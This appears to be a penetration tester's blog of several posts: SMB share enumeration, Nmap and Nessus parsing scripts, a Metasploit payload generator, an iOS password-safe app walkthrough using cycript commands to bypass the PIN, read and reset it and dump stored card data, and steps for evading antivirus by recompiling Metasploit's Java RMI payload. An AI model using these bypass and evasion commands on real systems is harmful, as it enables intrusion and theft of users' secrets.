Hack Whack and Smack

Loading A Weaponised Interactive PowerShell Session With Metasploit

A colleague @davehardy20 and I came up with this from an idea I had, it gives an Interactive PowerShell session from Metasploit, using newly developed Metasploit payloads.

Check out the blog post here for more information – https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit

Enjoy

Python Share Enumerator

Hey,

I’ve been working with a few large clients and needed to search a lot of network shares with a standard user account to see if the shares looked dangerous or overly permissive for the user, e.g. an Admin share has full everyone permissions and the user can capture sensitive data. To do this I’ve been using metasploit smb_enumshares and then manually looking through to see which ones were accessible from the list. As you can imagine this can take some time and not be very useful, however over a period of time I have seen some Hyper-V backups on shares that were accessible to users and could be download and back doored for the admin password hash etc.

This is a well worth task. So to cut a long story short I created a python script to do it, basically give it user credentials and a cidr subnet and it will enumerate all shares and files/folders that are available to the given user, Simples.

Usage: python ./shares.py <username> <password> <domain> <hostip> <cidr-rhosts>

python

Let me know what you think, but i’m sure you will find this extremely useful as I have already. A few dependencies listed below

#pip install https://pypi.python.org/packages/source/p/pysmb/pysmb-1.1.13.tar.gz
#smbconnection.py is another dependancy

Download link: shares.py

 

Simple Nmap Parser

Hey,

Needed to parse an Nmap scan really simply and couldn’t find anything useful so I created a simple c# application to do it. Thought others might find it useful, here’s a screenshot of the beast at work.

NmapParser

nmap

 

Nessus Parser in Python

I have been making a few programs in c# for parsing nessus and while these have been really good I wanted to expand my knowledge and create a python parser so that I can edit and change it on the fly while pentesting to get any specific information that I need or require. For example, I have used nmap to find all the web services but this never picks all of them up whereas nessus does and places a ‘svc_name=www’ under each port when this is the case, irrespective of whether it is ssl based or not.

Then I have a list of hosts and ports that I can have some confidence in and start to further explore each web port with ‘nikto’ and possible screenshot with ‘wkhtmltoimage’.

To cut a long story short I started writing my own class for this then stumbled across this code https://code.google.com/p/pynessus/. These classes allow you to call all its functions to parse or deal directly with the nessus scanning engine and run scans etc. I have only used this in the smallest way upto now but thought its an interesting blog and others could benefit from this too.

Here is an example script that pulls out all the web services from a nessus scan and places them in a list with their retrospective port after a colon, 10.0.0.1:443.

 


import dotnessus_v2

preport = “/tmp/localhost.nessus”
rpt = dotnessus_v2.Report()
rpt.parse(preport)

for t in rpt.targets:
    for v in t.vulns:
        if v.get(‘svc_name’) == ‘www’:
            print t.name +”:”+ v.get(‘port’)


 

Here is another example script that uses the other class to initiate a connection to the nessus server and launches a scan. Once the scan has launched you can also use the script to download reports as shown below. I take no credit in creating these scripts as they have been created by the author, I mererly have used the functions to pull out what data I want from the nessus and want to share this as I think its very useful.

 


import pynessus

server = “localhost”
port = “8834”
user = “nessus-user”
password = “nessus-password”

n = pynessus.NessusServer(server, port, user, password)

n.launch_scan(scan_name, policy_id, target_list_iter)

n.download_report(report_uuid)


Anyway, thought its worth a simple blog, heres the link to the class files. I also run these through a series of other little scripts to run nikto on all hosts aswell as running a screenshot grab for all web based services so that I can see them quickly. Here is a little bash script I wrote that takes the output from the above and gets a screen capture of all web services. First of all I run the web-parse.py to get my host list like so.

python web-parse.py | sort | uniq | tee web-hosts.txt

Then run my bash script below and for loop to run nikto.

for host in `cat web-hosts.txt`; do nikto -h $host > $host.txt ; done

grab.sh web-hosts.txt


 

#!/bin/sh

filename=”$1″
while read -r line
do
    name=$line
    echo “Name read from file – $name”

    TIMEOUT=3

    ( wkhtmltoimage http://$name $name.jpg ) & pid=$!
    ( sleep $TIMEOUT && kill -HUP $pid ) 2>/dev/null & watcher=$!
    wait $pid 2>/dev/null && pkill -HUP -P $watcher

    ( wkhtmltoimage https://$name $name-ssl.jpg ) & pid=$!
    ( sleep $TIMEOUT && kill -HUP $pid ) 2>/dev/null & watcher=$!
    wait $pid 2>/dev/null && pkill -HUP -P $watcher

done < “$filename”


Enjoy 🙂

Python AES Web Token Generator

Recently I was testing an Web App that made use of AES encryption to generate tokens. I put together my own proof of concept code to generate the tokens and to decrypt the tokens using pycrypto. The code reads in strings from a separate file and then uses the Key and IV with the AES algorithm to generate a AES encrypted/base64 encoded string. The method was a port of Microsoft .net standard written in VB. Im sure the code is a copy from somewhere with a few amendments so sorry if I stole your code! ;-P

Obviously for this to work you need the Key which was 16 bits long and pretty much unbreakable in the time I had but it was retrievable in other ways. Anyway just wanted to post this so that I was top of the leader board again! Woohoo!!

Code →AES-Token-Generator.py

Service Permission Checker (service-perms.exe)

Hi folks,

I slightly updated my program to show a few extra bits of information about the service. Firstly it now shows whether that user can stop and start the service, including the running state. Also it now shows the permissions on the parent folder incase these are different to that of the binary.

Happy hacking 🙂 Here is another link to the tool 

perms

Service ImagePath Permission Checker

Hi Everyone,

I know there are quite a few tools that do similar to this already but I wanted to create my own and just output all this data to an HTML file ‘simples’.

So basically this outputs a file called report.html and lists all the services and permissions on those binaries. It also has a column on whether they are unquoted service paths. Quite neat, looking to make loads of these type of tools for breakout testing, its also fairly useful when you have limited access to the box or need to download a tool that will run as a low level user and just open it with tools on the workstation, usually Internet Explorer.The following screenshot shows an example of the output.

services

Take a look and let me know what you think. Hopefully will be writing more into this so that it can do a lot more.

Download here

🙂

Metasploit Payload Generator Script – paygen

Hi,

When testing I always find myself doing more advanced exploitation on boxes and mostly use metasploit to do all these tasks, however I always forget the exact syntax for creating a metasploit payload and then setting up a multi/handler.

Obviously there is a load of easy ways to do this but I thought I would create a simple python script that basically takes your IP from eth0, then asks what type of payload to create and the output location. Once it has generated this is will create a multi/handler session with all the same settings ready for you. This then makes it terribly easy to run paygen then double click file from my samba share.

It could be improved by adding AV bypass techniques such as veil or ultimate payload but for now I have just done the basics. Anyway here is the script paygen, let me know thoughts, suggestions, insults etc……

PAYGEN

Have fun 🙂

IOS App Testing – Part 2

Okay so it might be a long time coming…

Part 2:

In part two we are again looking at Password Safe Apps but this time the App stores data in an unintelligible format (looks to be encrypted or at least encoded based on the method calls to read file in). Either way the files are not in clear text and from the class-dump we are calling an XFFile format which I couldn’t work out how to open. Part two is going to be looking at how to:

1. Execute actions

2. Mess with variables

3. Bypass logins and read files from apparently secure files.

Execute actions:

We have already followed steps from part 1 detailing how to dump the class information from an encrypted App using clutch and can now see that each function has a number of actions. Actions as I am referring to them are commands such as check-password or terminate application. The demo in this case will just be to lock the app. Which if put on a loop could be particularly funny should someone be trying to access their information:

The class dump shows the following output under AppDelegate:

–CUT–

-(void)initFileCount;

-(void)freeVersionWarning;

-(id)cloudURL;

-(void)loadData;

-(void)lock;

-(void)takePicture;

-(void)dealloc;

-(void)rateMyApp;

–CUT–

Therefore it is possible to execute the action by calling the class method and appropriate action with:

[UIApp.Delegate lock]

Some other interesting functionality can be seen such as takePicture and freeVersionWarning. The warning is particularly annoying. It would be interesting to change the message and have it pop up…

Messing with variable or property value:

This is just a quick and dirty example to show how to change messages on the screen and set variables or booleans. The screen at the time of login shows a nice message stating that the user should enter a password. Well I think we should be modifying that to some slanderous dig about the individuals man hood…….or at least to inform them of this new found predicament they are about to find them self in as we move through the next section.

Anyway to changing value:

Let’s start with where we are in the app on the screen and compare it to the method calls and associated variables.

cy# UIApp.keyWindow.rootViewController.visibleViewController

#”<InputView: 0x1fd67ed0>”

Reviewing the inputView method reveals a few interesting variables

–CUT–

-(void)changeType:(id)type;

-(void)reloadViews;

-(id)init;

(void)updateTittle:(id)tittle;

–CUT–

The one we are interested in is updateTittle the command below shows how we can check the title message by reviewing the inputViewTitle:

cy#[UIApp.keyWindow.rootViewController.visableViewController inputViewTitle]

Before:

originalmessage

No we can use the updateTittle to change the message given to the user at the login screen:

cy#[UIApp.keyWindow.rootViewController.visableViewController updateTittle: “Password is wrong mwahahaha”]

After:

newmessage

I have to reign in the insults so not to offend all the woman and children that visit the site…..

That was fun and all but what about breaking stuff….fear not…we’re here, the first parts are import in changing and manipulating the App and its response.

Breaking Stuff:

The first thing I am going to demonstrate how easy it is first and foremost to bypass the pin.

The method inputView actually has a delegate method called login this can be found by running the following command and reviewed in the class-dump:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate

#”<login: 0x1fdc9fc0>”

There is no need to go into great detail here it’s just the same as part one where we change a boolean function to return true. This was a little harder as there were multiple methods called and required a bit more digging. Don’t forget there are a number of usual functions at cycript for exploring the app.

The following command can be used to set the inputDidTestingPassword function to true, which results in the application allowing access with any pin, this is important as it informs us that a comparison is done on the password:

cy#UIApp.keyWindow.rootViewController.visibleViewController.delegate->isa.messages[‘inputDidTestingPassword:’] = function() { return true}

Stealing and Resetting the PIN:

The first thing we have to look at is the class-dump which shows the file userData being read in at the start of the method login which is a delegate of inputView:

login-method

Therefore if it’s going to be loaded into memory I want to be able to read it – or at least that is the plan. The following commands detail how to read files, the file in this case is userData:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData

#”<XFFile: 0x1e56fc40>”

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data

@{“password”:”1402″,”fileHidden”:true}

reading and changing pin

And there she is…..cycript is awesome!!!

Now let’s consider our earlier task of changing the message……..

Yep we can update the information in memory as per the screenshot above:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data = {“password”:”1234″,”fileHidden”:true}

{password:”1234″,fileHidden:true}

We can now login with the PIN 1234! HEHEHE not to forget the message about man hood!……………This could be quite a shock to a user of the App who ends up locked out and abused!

And logged in:

login

It is possible to access other files in the same way. I was to access the data while the app was open on the page. As can be see below

cy# UIApp.keyWindow.rootViewController.visibleViewController.file.data

@{“data”:@[@{“key”:”Account Number”,”value”:”3131313131″,”type”:6},@{“key”:”PIN”,”value”:”5555″,”type”:4},@{“key”:”Type”,”value”:”MasterCard”,”type”:12},@{“key”:”Bank Name”,”value”:”Happy Bank”,”type”:7},@{“key”:”Address”,”value”:””,”type”:7},@{“key”:”Owner”,”value”:””,”type”:7},@{“key”:”SWIFT Code”,”value”:””,”type”:1},@{“key”:”Routing Number”,”value”:””,”type”:10},@{“key”:”IBAN”,”value”:””,”type”:10},@{“key”:”Hotline”,”value”:””,”type”:11},@{“key”:”Notes”,”value”:””,”type”:9}],”imgName”:”154.png”}

The information available clearly details credit card information and pins normally secured, proving nothing is safe if your phone is rooted.

creditcard details

There will of course be a part three and the idea this time is not to wait so long and then rush something through ;-P

JavaRMI Remote Class Loading Exploitation with AV Bypass

Hi folks,

For some time now I have been finding the Java RMI remote class loading vulnerability and have been very suceesful with metasploit, however recently I have had Anti-Virus (AV) pick this up. While this is not a standard executable my usual AV bypass techniques were useless so I had to expand my research. For those who don’t know, Java Remote Method Invocation (RMI) services are used within applications to allow Java objects to be used from a remote location without the use of any authentication. If a client invokes a remote method to be called, the client would pass all the information in the form of a Java Object to the RMI service for this to then be executed.

When passing the Object the client can also specify a Class Loader which specifies where the Java code for manipulating the Object can be found, this is typically a URL to a Jar file. Without authentication or verification, the server then downloads the Java object and executes it under the same permissions as the Java RMI service (usually SYSTEM).

As a pentester you can take advantage of this RMI service to load and execute Java code on the system. This can all be done using metasploit just search for java_rmi. Anyway I am more interested in the times if fails because of Anti-Virus. To get around this I had to decompile the Payload.class file from within metasploit and make some fundamental changes as seen below.

cd /usr/share/metasploit-framework/data/java/metasploit/
cp Payload.class Payload-backup.class
jad Payload.class

sed -i ‘s/spawn/runme/’ Payload.jad
mv Payload.jad Payload.java
javac Payload.java

Once I did this I could successfully exploit this again. One thing to note is that I was using the Java target so you end up with a Java meterpreter shell to which you can escalate into a normal Meterpreter after.

javarmi

 

There are probably better Java obfuscation techniques that may have done this easier so any comments would be appreciated.

Cheers 🙂